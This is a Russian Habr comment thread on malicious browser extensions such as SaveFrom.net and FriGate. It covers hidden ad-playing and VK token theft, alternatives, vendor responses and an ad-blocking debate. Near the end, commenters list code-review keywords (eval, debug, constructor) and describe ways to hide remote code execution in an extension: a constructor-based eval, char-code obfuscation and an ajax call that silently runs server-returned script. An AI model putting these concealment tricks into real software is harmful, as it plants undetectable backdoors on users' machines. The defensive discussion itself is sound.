Возможно, поэтому FreeGate такой медленный
После прочтения статьи выпилил в хроме и заменил другим, которое (пока) не перечислено в списке скомпрометированных
Спасибо!

[tundrawolf_kiba]

Можете подсказать, каким?

[SNNikitin]

В принципе, первым попавшимся, но не перечисленным в статье )
chrome.google.com/webstore/detail/unlimited-vpn-proxy-%E2%80%93-unb/cpakggdipddapbfeceakkgdmdlegiajb?hl=en-US
Не знаю, можно ли размещать ссылку

[Solovej]

Антон lisr25 Было бы интересно услышать ваш комментарий, но активность у вас только в 2018 году. Вы же автор savefrom.net

[SNNikitin]

а как одно связано с другим?
код приведен — даже если яндекс не белый и пушистый, то это никак не умаляет ценности данной информации

[fireSparrow]

Яндекс не сливает данные силовикам. Если вы имеете в виду предоставление информации по запросам — то тут особого выбора и нет, любая компания, существующая в рамках отечественного правового поля обязана это делать.
По поводу сбора бигдаты — а в чём конкретно претензия? Есть какие-то конкретные случаи явно незаконного/аморального использования этих данных? Или претензия именно в том, что компания, суть деятельности которой именно работа с данными — внезапно вдруг работает с данными?

[insolite]

Правовое поле в России? Вы в пещере последние 20 лет прожили?

[fireSparrow]

Вы правда не понимаете, о чём идёт речь, или просто решили продемонстрировать остроумие?
То, что в нашей строне закон — что дышло, никак не поможет игнорировать запросы от органов, которые оформлены соответствующим образом.
Если к вам с запросом придут, вы скажете, что в России нет правового поля, и поэтому вы запрос выполнять не будете?

[insolite]

Я прекрасно понимаю, о чем идет речь. Поэтому не надо петь песни про «не сливает», для этого не нужно задействовать формальную процедуру.

Еще напомните, когда там Яндекс был выведен из под действия СОРМ?

[Codenamed]

Опять рептильно-земноводная ситуация.

С одной стороны, встраивание зловредов со стороны разработчиков расширений, и за такое надо карать.

С другой стороны, они наносили ущерб продавцам контента, которые сами ответственны за выжигаение где возможно инструментов свободного распространения контента, поэтому однозначно осудить их не получается.

Мир сложный :)

[kukutz]

Ущерб они наносили пользователям в первую очередь: ресурсы компьютера не бесконечные + см. про токены ВК.

[swelf]

Несколько лет назад потребовалось написать расширение для браузера. Стал изучать вопрос. И был неприятно удивлен, к чему безобидные расширения имеют доступ, теперь на фоне доступа расширений мне кажется вполне безопасным написать пароль на листочек и наклеить на монитор.
FF при загрузке в их магазин просят так же предоставить и исходники до сборки всякими вэбпаками, что в теории упрощает поиск вредного поведения.

[Revertis]

У Мозиллы есть предпроверка, а Гуголь экономит на человеческих ресурсах и пропускает всё, что угодно.

[rrrad]

С учётом увольнений в мозилле, не уверен, что предпроверка всё еще делается.

[dartraiden]

Там при публикации дополнения нужно подтвердить (поставив галку), что дополнение не содержит обфусцированный код и прочие штуки, наличие которых требует проверки человеком.

Вероятно, если попытаться обмануть, и обман вскроется, можно вылететь из каталога навсегда.

[tesessinshur]

Хорошая работа, ребята! Будет еще лучше, если сделаете аналог такого расширения, а то я что-то не нашел пока замены сейф фром нет. Может подскажите?

[chelovek-jpeg]

тут предлагали habr.com/ru/company/yandex/blog/534586/#comment_22459510

[eimrine]

Подскажите, пожалуйста, актуальный способ сохранить аудиофайлы с vk. У меня на странице есть альбом который мне очень нравится (4 трека), и я не знаю как его достать. Все ссылки в Сети на данный альбом мертвы, на торрентах его никогда не было, и похоже что нигде больше кроме как на моей странице vk его нету. Про SaveFrom не знал, да и в моей стране зайти вконтактик без платы за vpn можно разве что в Opera Turbo.

[JimDi]

vkopt, но в виде userscript, т.к. запретили выкладывать в магазины аддонов версию со скачиванием. tampermonkey вполне проглатывает и всё работает.

ну и всегда есть инструменты разработчика — с их помощью вполне вытащить всё можно

[Cromion]

music.xn--41a.ws Неплохой вариант, обычно все нужные треки находит.

[Programmer74]

Можно попробовать скачать через клиент VkCoffee, он ни в чем плохом (вроде) (пока) не замечен, но позволяет скачать любой трек в mp3.

[rostislav-zp]

Под андроидом этим пользуюсь.на других ОС на данный момент альтернатив найти не смог
https://vmp.su/

[navion]

Я пользуюсь Music Saver, правда не уверен в отсутствии закладок и включаю его лишь когда надо скачать новый трек. Но один трек не берёт даже он, выдавая 404.

[DARTH---ALEXIEL]

Нормально этот трек скачивается, пусть и с предварительной конвертацией. Windows 7, Chrome, Tampermonkey, Download Master (расширение + программа в фоне).

[JTG]

Путь джедая:

— зайти в музыку
— открыть инспектор сети
— в фильтр ввести «m3u»
— жмякнуть «play» на нужном треке
— скормить получившийся URL вида «cs1-74v4.vkuseraudio.net/.../index.m3u8?extra=...» ffmpeg или youtube-dl:

ffmpeg -i "url" filename.mp3
youtube-dl "url" -o filename.mp3

[Oxyd]

Я, у себя под линуксом, всю свою музыку выкачал из ВК вот этим скриптом на Python. По идее под виндой/маком тоже должен работать. Там ничего системозависимого нету.

[BioHazzardt]

Чекнул исходник background.js плагина savefrom.net для лисы — там указанного кода нету, и в background.js всего 7607 строк кода. Возможно (но это не точно) проблема актуальна только для хрома и его производных

[yatanai]

Сижу читаю и тоже думаю — "Никогда не было проблем с расширениями в тч и сафефромом на огнелисе. Хотя были прикольные, что фигню на стороне творили и из-за этого весь сырбор? ".

[dartraiden]

Были (с другими дополнениями). FastProxy воровало кэшбек. S3.Translator передавало данные своему создателю, даже после того, как пользователь явно отказывался от сбора статистики (а ещё при установке подталкивало пользователя соглашаться с отправкой всей истории браузера автору дополнения, что, на мой взгляд, недопустимо). Stylish сливало полную историю.

[3aBulon]

А как сейчас со stylish? пользуюсь им прямо сейчас, вот хабр у меня серый, ну не нравится мне белый интернет.
p.s. нагуглил stylus, попробую его.

[dartraiden]

SimilarWeb (новый владелец Stylish, который и встроил туда бяку) раскаялась, но при наличии Stylus смысла продолжать доверять Stylish как-то нет.

[Hiccup]

Будут ли какие-то санкции к разработчикам расширений?

[Timofejj]

В данном случае Яндекс верно поступил. По мне их (расширения) поведение стало подозрительным ещё несколько лет назад, с первых дней установки. Поэтому в моём браузер они не задержали более недели. Мне того хватило с головой, да и свет на них клином не сошёлся. А что касается savefrom.net, так этот сервис вообще обхожу стороной в любых вариациях и проявлениях. Они пропихивают себя везде и всюду.

[Vort123]

Вроде, не так давно у FriGate менялось пользовательское соглашение. Без его принятия расширение отказывалось работать. Может, "расширенная монетизация" как раз в тот момент и началась?

[Sunny-s]

Еще одно расширение в Хроме делало то же самое у меня — JSON Viewer Awesome
chrome.google.com/webstore/detail/json-viewer-awesome/iemadiahhbebdklepanmkjenfdebfpfe

[JimDi]

удобная ему замена — JSONView
chrome.google.com/webstore/detail/jsonview/chklaanhfefbnpoihckbnefhakgolnmc

[avdosev]

JsonDiscovery тоже не плох, узнал про него из статьи на хабре
https://chrome.google.com/webstore/detail/jsondiscovery/pamhglogfolfbmlpnenhpeholpnlcclo

[Kicker]

А есть баунти программы от яндекс браузера в поисках вредоносных расширений?)

[ganzmavag]

Странно, а это нормально, что в мобильном Яндекс.Браузере SaveFrom даже удалить нельзя — максимум выключить? Я думал это как раз потому, что он командой Яндекса проверен со всех сторон.

Скриншот

[kukutz]

Это витрина, он не установлен и даже не скачан на телефон. Просто стор экстеншнов. И оттуда мы Savefrom убрали, если ещё не пропал, то вот-вот пропадет.

[ganzmavag]

Что-то тут не сходится, потому что прямо сейчас действительно SaveFrom переместился в подраздел «Из других источников», при этом включить его можно было даже без интернета (специально проверил). И теперь появилась кнопка удалить.
Каким образом не установленное и не скачанное расширение включалось без интернета, и как можно удалить то, что не установлено?

[kukutz]

«Удалить» и «из других источников» появляется только у тех, кто это расширение хотя бы однажды включал. На телефонах и ПК, где его не включали, его сейчас на странице дополнений нет ни в каком виде.

[ganzmavag]

Вы же сами мне выше написали, что оно у меня не установлено и даже не скачано. Получается обманули?
Я не могу понять логику. Вы показываете пользователю «витрину», в которой зачем-то не афишируете, что это стороннее расширение, назвав кнопку «скачать и установить» почему-то просто «включить». Из чего я например сделал (как выяснилось ошибочный) вывод, что это расширение — часть браузера.
Так еще и потом не давали возможность удалить это расширение, если я хоть раз его включил, пока вдруг не оказалось, что оно вредоносное.
Вы можете как-то пояснить, зачем вы так делали? Какие были причины?

[kukutz]

Я не знаю, что у вас и не писал, что конкретно у вас.

Давайте я ещё раз объясню логику:
1. есть витрина, стор расширений. На ней есть несколько расширений, это просто буквы, их кода нет на вашем телефоне, пока вы не нажмете кнопку включить или установить.
2. если вы нажмете включить/установить, код скачается, расширение установится, и появится возможность его отключить. Удалить с витрины расширение нельзя.
3. с этой витрины мы убрали savefrom, после того, как обнаружили то, что в посте.
4. ниже под этой витриной список установленных (включенных либо отключенных) у вас расширений, откуда вы можете их включать, выключать и удалять.

[Osnovjansky]

есть витрина

любопытно, а предиктивное кеширование (или как там сейчас правильно называется кеширование того, что по мнению браузера может захотеть скачать пользователь) не скачивает ли заранее плагины с витрины — это могло бы объяснить, что ganzmavag смог включить плагин при отсутствующем интернете

[ganzmavag]

Как я понял, дело не в этом. Я когда-то давно включал это расширение, а потом максимум, что мне позволил сделать с ним браузер — выключить, но не удалить. В результате оно и включилось без интернета, потому что было уже скачано.
Вот сейчас например у меня есть одно ранее установленное расширение — я его тоже удалить не могу, нет такой кнопки.

Скрин

[ganzmavag]

4. ниже под этой витриной список установленных (включенных либо отключенных) у вас расширений, откуда вы можете их включать, выключать и удалять.

Так не могу удалять, в этом-то и странность. Я ниже скриншот привел — там есть только кнопка «Выкл» у расширения, которым пользовался один раз. И с SaveFrom точно также было — кнопка удалить появилась только после этого поста на Хабре, и то с опозданием. Версия Я.Б при этом самая актуальная.

Скрин

[kukutz]

См. пункт 2. Удалить расширение с витрины вы не можете, это так.

[Aquahawk]

Знаете что меня зацепило? Заголовок статьи в виде Яндекс Дзен

[perfect_genius]

Давно заменил Savefrom на "ss" в адресной строке, а Frigate включаю только при заходе на блокированные сайты. В начале года тоже мучился такой внезапной рекламой, даже к своему провайдеру обращался.
Думал уже, что вирус-троян какой-нибудь подхватил.

[talbot]

Ну в общем-то это и был троян: замаскированное под легитимное расширение, стягивающее задания и управляемое через C&C сервера.

[Stesh]

Скорее это уже целый ботнет в чистом виде.

[technik]

Рекомендую поставить «Обход блокировок рунета» вместо Frigate. Сам долгое время на нём сидел, но также стал замечать что на неслабой машине браузер стал сильно тормозить и после поочерёдного отключения расширений пришёл к такому же выводу.

[zartarn]

Еще бы там по умолчанию весь список был бы отключен. А то на каждый сайт заходить и отключать, ну оч неудобно, когда надо только для нескльких. За что фригейт и любил.

[ifap]

Самое прекрасное в этой истории, что проблеме уже как минимум несколько месяцев, а узнали о ней случайно по косвенным признакам. Т.е. никто не проверяет трафик со своего браузера на предмет появления там неожиданных хостов?

[dartraiden]

Я с уверенностью могу сказать, что подавляющее большинство пользователей не проверяет (и слов «Wireshark» или «Инструменты разработчика» даже не знает).

[7profy]

большинство пользователей не проверяет

И даже большинство программистов не проверяет!
Сложность современных устройств и программ требуют настолько узко специализированных знаний, что, например, высококлассный программист микроконтроллеров не в состоянии оперативно разобраться в каком-то плагине браузера, и наоборот!
Прошли те времена, когда программист знал всё. Сейчас, чтобы вникнуть в предметную область, нужно потратить месяцы.

[Mordov]

А можно как то перерезать сухожилия расширению что бы оно не лезло куда не надо но при этом продолжало работать?

[Roll45]

SaveFrom.net не ставиться в ЯндексБраузере при первой установке разве? Яндекс не хочет сам себя наказать как то? по сути сам яндекс это ставил всем пользователям.

[BarakAdama]

Нет, не ставится и не ставился. Возможно, вы имеет ввиду витрину мини-каталога расширений.

[Roll45]

какая разница? на странице расширений есть, значит яндекс за них ручается, что ничего не будет. browser://tune/ вот тут они были, и для пользователя нет разницы стоят они или нет. Он увидит нужную функцию и включит (установит)

[kukutz]

Одно из них было в нашем сторе расширений, это правда. Остальные 20 в сторах Гугла и Оперы.

Как вы предлагаете наказать разработчиков Яндекс.Браузера и его стора? )

[DerRotBaron]

Стоило об этом хотя бы сказать. И заодно принять меры по улучшению модерации этого каталога и явно побанить там мутные вещи вроде обфускации

[kukutz]

Вот же, сказали, как обнаружили, мы под статьей с этим «сказали» и пишем комментарии.

Меры примем, но собственно я повторю: в сторах Оперы и Хрома всё то же самое :(

[Roll45]

лично я давно наказал, никогда не пользуюсь данным поделием как яндексбраузер. Тормоз, тормозом погоняет. Сам какието дополнения ставит, везде пихает свои говняные сервисы, и партнеры ваши в лице тогоже Савеформ тоже говно. Или скажите что вы свой ябраузер не пихаете где только не можно и нельзя?

[x893]

+10

[SergeyMax]

Яндекс не хочет сам себя наказать как то?

Почему вы предлагаете наказать именно яндекс, а не разработчика вредоносного ПО? Только потому, что яндекс вот он, а разработчика иди ещё найди?

[Sabubu]

По моему, так люди, которые ставят расширения, слегка безумны (а те, которые в комментариях тут рекомендуют альтернативные расширения или ждут, что кто-то удалит из них рекламу — наивны). Ведь расширение это по сути бекдор в браузере, оно имеет доступ ко всем вашим секретам. Оно может лайкать от вашего имени проправительственные посты в соцсетях, сливать ваши пароли и переписку, видеть страницу вашего интернет-банка. Потом ваши данные окажутся на черном рынке. Стоит ли возможность скачать какое-нибудь глупое видео того?

Неужели вы верите, что расширения разрабатываются за бесплатно без монетизации?

Потому я не ставлю никакие расширения в браузер. Особенно, когда есть youtube-dl, который может все то же, но без бекдоров.

Также, я бы на месте разработчиков браузеров принял бы запрет обфускации кода и сетевых данных, передаваемых расширениями. Пусть либо пересылают данные в открытую, либо сразу получают бан.

[Jipok]

Нужно просто смотреть разрешения. Не ставьте адоны с доступом ко всему. Проверяйте доступен ли исходный код.

[mistergrim]

Особенно, когда есть youtube-dl, который может все то же

Скажите, как при помощи него скачать отдельный трек из ВК?

[JTG]

habr.com/ru/company/yandex/blog/534586#comment_22500024 :)

(а как только надоест извлекать ссылки через такое место — садитесь и пишите юзерскрипт для tampermonkey, который будет это делать за вас :)

[alsoijw]

Про свободный софт не слышали?

[Vilgelm]

Проблема в том, что функционал Chrome без расширений довольно печален. Даже текст нормально выделять нельзя (имеется ввиду выделение текста на ссылках), я уж не говорю про блокировку рекламы и так далее. Выручает Vivaldi, где многое встроено, но что-то все равно приходится ставить для работы с прокси, для usercss и прочее необходимое.

[kukutz]

Выделять текст в ссылках в хромиум-браузерах можно с зажатым Alt, это, к слову, команда Яндекс.Браузера сделала и закоммитила в Chromium.

[ProRunner]

О, спасибо за подсказку)

[up40k]

выделение текста на ссылках

А разве выделение текста мышью с зажатым Alt — это не стандартный функционал, который работает практически везде? Или я вас неправильно понял.

[BarakAdama]

В Chromium он стал стандартным после того, как команда Яндекс.Браузера закоммитила это изменение в проект. Это случилось где-то пару-тройку лет назад.

[tundrawolf_kiba]

Эх… Вот бы еще кто запилил поддержку в браузерах XPath 2.0 или более высоких версий, а тот от Гугла не дождешься.

[Vilgelm]

Нормальным — это когда Alt зажимать не надо, как было в Opera Presto. Впрочем, раньше Хром(иум) и так не умел, это сравнительно недавно появилось.

[Hotty]

Хочется в свою очередь дать коментарий со стороны Savefrom.net.

Некоторое время назад мы добавили монетизационного партнёра, который должен был собирать неперсонализированную аналитику пользователей. При изучении кода интеграции, мы не обнаружили злонамеренного поведения.

Но кроме сбора обезличенныйх данных он, по всей видимости, использовал встроенный код и для прокрутки видео-рекламы в скрытой вкладке.

Благодарим специалистов Яндекса, что обнаружили потенциально опасный код.
Сейчас этот партнёр удалён из кода наших продуктов, и в будущем мы его добавлять не будем.

Все решения, которые принимает наша команда, исходят из логики — user first, и мы ценим персональную информацию пользователей и их бесплатный доступ к услугам нашего сервиса, которыми они пользуются.

[Yalishanda]

Скажите, пожалуйста, а вы планируете публично назвать этого «монетизационного партнёра»?
Ну, знаете, чтобы другие так же не вляпались?
Ведь в настоящий момент страдает ваше доброе имя. Откуда клиентам знать, был ли там вообще какой-то «партнёр»?

[Hotty]

Мы находимся в тесном контакте с командой Яндекса, и предоставляем им всю необходимую информацию, для проведения более глубокой оценки ситуации.

[StjarnornasFred]

Нет, не Яндексу, а всему интернету, пожалуйста. Можно прямо здесь.

[PocketM]

Перевел ваш комментарий с языка маркетологов на человеческий:

Некоторое время назад мы добавили монетизационного партнёра, который должен был собирать неперсонализированную аналитику пользователей красть личные данные пользователей.

Может кто объяснить, с чего вдруг сбор (воровство) информации пользователя стало нормой? Раньше ПО, которое такое делало, считалось вирусом и оказывалось в базах антивирусов.

Под понятием «неперсонализированная аналитика» может скрываться все, что угодно не содержащее ФИО пользователя. Неперсонализированной могут называть историю браузера + уникальный ид пользователя.

[ifap]

Давайте я попробую: все началось с мобильных гаджетов, когда Эппл и Гугл стали красть все, до чего могли дотянуться, а их за это сразу же не распяли. Затем подтянулся Мелкософт со своими «обновлениями функционала», и его тоже не распяли, потому что эвфемизм «телеметрия» стал уже привычным слуху и вроде как не страшным. А сегодня, спустя… сколько уже лет? все вдруг встрепенулись и заохали: ах, Фригат че-то там крадет… давно, оказывается, и не особо-то скрывает, но пока кто-то не поинтересовался и не вытащил жуликов на свет, никого это и не парило.

[vikarti]

если user-first то можно убрать обфускацию в том что ставиться через tampermonkey на хроме?
от чего она в данном случае защищает?

[BIG666]

Чем Вы можете подтвердить свою принадлежность к авторам этого расширения?
Почему мы должны верить, что Вы действительно имеете отношение к SaveFrom.net и уполномочены делать заявления от их имени?

[Areso]

Но, вместо сбора аналитики, вы разрешили партнёру исполнять произвольный код, к тому же — обфусцированный.
Знаете, как это вас характеризует?)
Выбирайте по вкусу:
1) преступная халатность;
2) мошенничество (напомню — «злоупотребление доверием в корыстных целях»), по предварительному сговору, группой лиц.

[1PoRtvine]

Добрый день, никто не знает за friGate UA — для України оно безопасно?
https://chrome.google.com/webstore/detail/frigate-ua-for-ukraine/biokbpahnhnolgnfoblfflgopeepaoik

[Solovej]

Так ведь статью читали же, добавив пару букв к названию думаете ситуация изменится? Люди целиком названия меняли, но при этом вредоносный код оставался тем же.
Стоит ли пользоваться продуктом у которого в названии friGate написан — как сами думаете?

[Osnovjansky]

На мой взгляд, любой «чужой» прокси — небезопасен, т.к. имеет доступ к данным, которые вы через него передаёте.

С другой стороны, если для того чтобы изредка глянуть почту, одноглазники, вк, и т.д. — то поставить отдельный браузер с этим плагином (лучше в отдельной виртуальной машине, которую откатывать к настроенному состоянию), и почти пофиг, есть ли там вредоносы

[Revertis]

Не «за», а про или о.

[Osnovjansky]

То-есть под бутылочку «беленькой» за жизнь не разговариваете? :)

[Revertis]

Это не по-русски.

[1PoRtvine]

На скорую руку, задал вопрос и допустил ошибку. ;)

Расширения отключил, список сайтов закинул в hosts.
Как-то так… :-\

[SONce]

Удивительно что отключили только сейчас, savefrom показывает/подменяет рекламу при его активации в браузере уже года 3 точно, в какоето время я помню он даже чемто тетектился(не особо популярным, типа авиры). Поразительно что это вскрылось только сейчас

[JTG]

Там какое-то время назад в настройках была галочка «показывать рекламу авиабилетов» или что-то такое, а потом оно окончательно скатилось.

[goldrobot]

А зачем они это делали? Какой профит кинотеатрам от фейковых просмотров? Тем более что они сами могут их у себя нарисовать.

[Solovej]

Для поднятия сайта в поиске. «Много посещают — значит популярный.»

[goldrobot]

Но ведь просмотр видео контента это не посещения, и сомнительно что поисковики это учитывают, и вообще могут учитывать хоть как-то?

[Solovej]

Я не знаю всех кухни мошенников, но счетчики так же считают статистику времяпрепровождения пользователя на сайте.
Да и реклама во время просмотра видео тоже показывается.

[SONce]

еще как могут, и учитывают

[batyrmastyr]

1. Чтобы впечатлить рекламодателя большой посещаемостью. Кто-то платить за переходы, кто-то за показы, а кто-то фиксированную сумму кое-как увязанную с количеством уникальных посетителей в последнее время.
2. Если кинотеатр платит правообладателю пропорционально количеству просмотров фильма, то и у правообладателя появляется мотив.

[kukutz]

Кинотеатры получают деньги за каждый просмотр рекламного видеоролика от рекламных сетей, а те от рекламодателей.

Дальше понятно, думаю.

[kukutz]

Несомненно. Поэтому то, что мы сегодня сделали, защищает интересы и пользователей, и рекламодателей.

[Sky550]

У меня недавно (около месяца назад) улетел токен ВК и некая барышня вела переписки с моего аккаунта, сразу же удалил вкопт с оперы но скорее всего виновником таки был сейвфром. Самое обидное что восстановить на месте не удавалось, от ВК ни звонки ни смс не доходили на украинский номер именно в тот момент. Кстати фригейт просто рекламу в вкладках открывает, это же впринципе легально, да?

[grishkaa]

Яндекс, который у себя на сайте адски обфусцированным кодом через shadow DOM и прокси обходит блокировщики рекламы, пишет о том, как расширения с обфусцированным кодом делают очень плохие вещи. Иронично.

[fireSparrow]

Действительно, какие негодяи — на собственном сайте ищут способы защищаться от средств, меняющих отображение сайта. Это, конечно же, так же аморально, как создание мошеннического ботнета путём тайного использование чужих ресурсов. /sarcasm mode off
То есть вы правда думаете, что защита от блокировщиков рекламы является более предосудительным делом, чем собственно использование блокировщиков рекламы?

[grishkaa]

В моём сознании и то, и другое — вредоносное ПО. Блокировщики рекламы дают пользователю больше контроля над собственным браузером, и это хорошо. Это моё устройство, и я решаю, какой код ему можно загружать и выполнять, а какой нельзя.

Как сайтам зарабатывать? Это не проблема пользователя и не его ответственность. Хабр, как и большая часть других сайтов, не пытается ничего обходить, и как-то выжил.

[fireSparrow]

Это моё устройство, и я решаю, какой код ему можно загружать и выполнять, а какой нельзя.

Вас насильно никто на сайт с рекламой не затаскивает, вы на него сами добровольно заходите. В данной ситуации владелец сайта вам ничего не обязан. Он предлагает вам пользоваться сервисом взамен на просмотра рекламы. Вы же сервисом пользуетесь, свою часть сделки не исполняете, да ещё и жалуетесь, что владелец сервиса вас в этом не поддерживает.

[grishkaa]

свою часть сделки не исполняете

Я какой-то договор об этом подписывал что ли? Не подписывал — значит никаких обязанностей по отношению к владельцу сайта у меня нет. Как, впрочем, и у него по отношению ко мне.

сервиса вас в этом не поддерживает

Не «не поддерживает», а «целенаправленно активно мешает, используя свою уникальную позицию как владельца крупной рекламной сети».

[fireSparrow]

Так давайте всё-таки определимся — владелец сайта имеет перед вами какие-то обязательства или не имеет? А то по вашему получается, что никто никому ничего не обязан, но при этом владелец сайта вам что-то должен. Хотя в данной ситуации это вы — хитрозадый халявщик, и с моральной точки зрения именно ваша позиция более шаткая.

[grishkaa]

Владелец сайта ведёт себя как очень нехороший человек, прилагая дополнительные усилия, чтобы обнаружить блокировщики и пропихнуть рекламу через них. Это осознанное, целенаправленное активное действие. Мне это именно с такой общечеловеческой точки зрения неприятно.

Да и сама реклама. Она на меня не действует, от слова совсем. Для меня это бесячий информационный шум. Есть люди, на которых она действует. Есть те из них, кто осознанно не ставит блокировщики, и даже говорят, что реклама им полезна. Какого полезного эффекта по задумке владельца сайта должна достигнуть такая насильственная реклама — непонятно, но она уж точно не заставит меня заинтересоваться рекламируемым товаром. Разве что яндексу в своём же директе просмотры накрутить. Отсюда напрашивается вполне логичный вывод, что это делается исключительно для того, чтобы мне насолить.

[DracoL1ch]

Далеко не все пользователи блокировщика рекламы используют его осознанно, обычно это родители и девушки/парни тех, кто связан с IT. Поэтому есть смысл обходить фильтры, даже если стоит блокировщик

[nuclight]

С моральной точки зрения, очевидно, халявщик — это владелец сайта. Ничего не делая, ведёт себя как спамер, прикрываясь тем, что вроде как не настолько навязчиво (но некоторые не делают даже и этого, когда в десятке попапов от контента остается меньше четверти экрана).

С моральной точки зрения, очевидно, рекламы вообще существовать не должно — не только в Интернете, но и в реальной жизни. Это как если бы я пришел в библиотеку, а мне вместо запрошенной книги выдали сборник рекламы. Или когда я иду по улице, а мне начинают орать в ухо и совать в руки зазывалы из магазина рядом. Или как если бы я получал тонны геббельсовской пропаганды в газетах, на радио и телевидении.

[a1111exe]

С моральной точки зрения, очевидно, рекламы вообще существовать не должно — не только в Интернете, но и в реальной жизни.

Любой способ бизнеса донести до людей информацию о существовании своего продукта можно расценивать, как рекламу. Если такого способа не будет существовать, то загнётся любой бизнес, продукт которого не является физическим и не выставляется непосредственно на продажу на конкретном рынке или в конкретном магазине. Если последнее (выставление на прилавок) тоже рассматривать как рекламу, которой не должно существовать, то загнётся любой бизнес. В этом случае люди смогут получать продукты только от государственных поставщиков, причём только заранее точно зная, чего конкретно хотят. Конкуренции не будет. Разнообразия продуктов не будет. В лучшем случае будет государство, предоставляющее фиксированный набор заранее известных продуктов.

P.S. Я сам не любитель рекламы, и считаю, что в текущей ситуации встречается немало аморального использования рекламы. Но, конечно, не могу считать концептуально саму рекламу аморальной. Хотя… Могу, но тогда буду вынужден считать аморальным частный бизнес любых направлений и масштабов; деньги, конечно, тоже. Единственный моральный вариант такой реальности, который приходит в голову — все работают бесплатно и исключительно по желанию; все получают всё, что хотят и когда хотят — опять-таки бесплатно. А максимально моральный вариант — когда каждый всегда точно знает, чего хочет, и для каждого без всяких усилий немедленно реализуется всё, чего он хочет, и не реализуется ничего из того, чего он не хочет или не хотел бы. Было бы круто! До тех пор практически реализуемая мораль должна считаться с вопиющим несовершенством человеческой реальности. Имхо.

[KivApple]

халявщик — это владелец сайта. Ничего не делая

Ну он сделал что-то, что заставило вас придти на этот сайт — наполнял его контентом, привлекал пользователей (если там есть коммунити), оплачивал хостинг.

[JPEGEC]

В данной ситуации владелец сайта вам ничего не обязан.

Как и я ему. Я не обязан читать весь контент. Имею право читать выборочно.

жалуетесь, что владелец сервиса вас в этом не поддерживает

Это да.

[vikarti]

Вас насильно никто на сайт с рекламой не затаскивает, вы на него сами добровольно заходите

Ничего что может не быть тупо альтернативы? Потому что альтернативу — задавили тем или иным путем.
Либо (что реже но бывает) именно — затаскивают, пусть и не владелец сайта (например «в рамках обучения вам нужно изучить следующие ролики на youtube....»/«новости и оповещения (обязательные к просмотру) публикуются в группе XXX вконтакте»).
При этом варианта заплатить деньги за убирание рекламы как минимум — может просто не быть (у гугла с почтой — он хоть есть, в лице G Suite, у Youtube — есть подписка).

[Massacre]

Сравним это с антивирусами и троянами на сайтах. Принцип очень похожий. И тоже можно сказать «вас насильно никто на сайт с трояном не затаскивает»…

[lostero]

Скорее так:

1. Владелец ресурса предоставляет доступ к данным на своих условиях (аналог лицензионной программы);
2. Юзверь не хочет "платить" (загрузить и посмотреть рекламу) и пользуется "кряком" на ресурсах, которые требуют этого (блокировщиком рекламы, бан листом в etc/hosts, и т.п.).

Посещая ресурс вы заходите в частную лавочку, где владелец царь и бог в рамках закона (умышленное распространение троянов, если я правильно помню, немного наказуемо).
Не нравится ему, что вы нагружаете его сервера и не платите, он вас выгонит в рамках закона. Но и вы вольны в рамках закона вытворять всякое в его лавке.
Закон там ещё не устаканился, но я сомневаюсь, что владелец лавки в ней же будет иметь меньше прав, скорее наоборот.

[BrainDebugger]

Если брать стоимость рекламы на Youtube в 3 доллара за 1000 просмотров и просмотр — 10 секунд, то получается примерно 1 доллар за час.
Это примерно как сдавать свое внимание по расценкам вторсырья.
А при любых альтруистических действиях ценность пользы, которую получит другой должна быть больше, чем мои затраты, иначе зачем я это делаю.

Поэтому совесть не мешает мне блокировать рекламу. Лучше поддерживать достойные проекты донатами.

[grishkaa]

Вот да. Если пользоваться интернетом так, как задумано рекламными корпорациями, каждый твой вдох отследят, будут на нервы действовать постоянно из всех щелей, затирая про «advertising experience», а владелец сайта с баннером получит за все твои страдания целых несколько центов.

[kovalevsky]

Это решаете не Вы, а блокировщик рекламы, который, кстати, точно так же может начать сливать и/или догружать к Вам на страницу что-угодно.

[vikarti]

у блокировщика обычно открытые исходники, БЕЗ обфускации.
у вменяемых блокировщиков подписки на фильтры — настраиваются.
и можно посмотреть что именно из фильтров применилось.
и выборочно отключить на конкретном сайте.

[greengrunt]

второй раз радуюсь, что перешел с хрома на яндекс))) Первый раз радовался приложению и удобной более-менее интеграции переводчика в браузер)

[sergey-b]

Рано радуетесь. Для начала рекомендую зайти в настройки сайтов в раздел разрешение доступа к микрофону и посмотреть, что там в исключениях.

[Maxim_Q]

Для самостоятельной проверки исходных кодов расширения что можете посоветовать кроме как поиска функций debug() и eval() внутри расширения? Если эти функции есть значит нужно пристально изучить эту часть кода и понять зачем это добавлии.

[kukutz]

Ещё как минимум constructor можно для eval использовать.

[yarglor]

По удивительному стечению обстоятельств, «99, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114» как раз и переводится как «constructor».

[JTG]

У любого мало-мальски сложного расширения в коде будет столько мест, куда можно незаметно засунуть RCE, что не всякая команда аудиторов заметит. Вон из самого банального выше упомянули конструктор, аля RegExp['constructor']('alert(1)')(), или внешне безобидный $.ajax без указания dataType, например. Передаётся туда какой-нибудь "/pixel.gif", а удалённый сервер раз в месяц при полной луне в ответ возвращает Content-Type: application/javascript и приехали.

[czz]

Фактически это ботнет.
Хорошо бы, чтобы это закончилось уголовным делом.

[da411d]

Далее идёт большой switch, который ответственен за загрузку и выполнения JS-кода.

Очень похоже на трансформацию асинхронного кода через Babel

[Mairon]

Яндекс устраняет конкурентов в слежке за юзерами?

[sergey-b]

Пошел смотреть список установленных в браузере расширений. Обнаружил следующее:

Yandex Elements: Weather (это значок, который температуру воздуха за окном показывает)

• Read and change your data on the websites you visit
• Determine your location
• Read and change your browsing history
• Display notifications
• Read and change your bookmarks
• Manage your apps, extensions and themes

Та же фигня в Yandex Elements: mail, который я использую для того, чтобы видеть, сколько непрочитанных сообщений у меня в почтовом ящике.

Задумался.

[sergey-b]

Yandex.Metro would like to find and connect to devices no your local network — это на айфоне. Можно смело утверждать, что данный пост о борьбе с медом опубликовали чем-то недовольные пчелы.

[neko_nya]

Приложения яндекса распихивают контекстную рекламу по устройствам в локальной сети, что вообще откровенное свинство и нарушение неприкосновенности частной жизни.

[kukutz]

Можете пояснить, что значит «распихивают рекламу по устройствам»?

[neko_nya]

Это значит, что контекстная реклама по результатам поиска в сети на одном устройстве в локалке появляется и на других устройствах в этой же локалке.

[chektor]

Почему эта статья не в протоколе допроса? Где посадки?

[JPEGEC]

Изначально читал с некоторым негативом, типа «опять лезут куда не просили», но увидев в финале

После этого они смогут принять осознанное решение и при необходимости включить их вновь

приятно удивился.
И да, уверен что большинство включит. Ибо скачать ролик пользователю важнее чем какая-то безопасность. Самые ловкие выключат после скачивания.

[krab4yar]

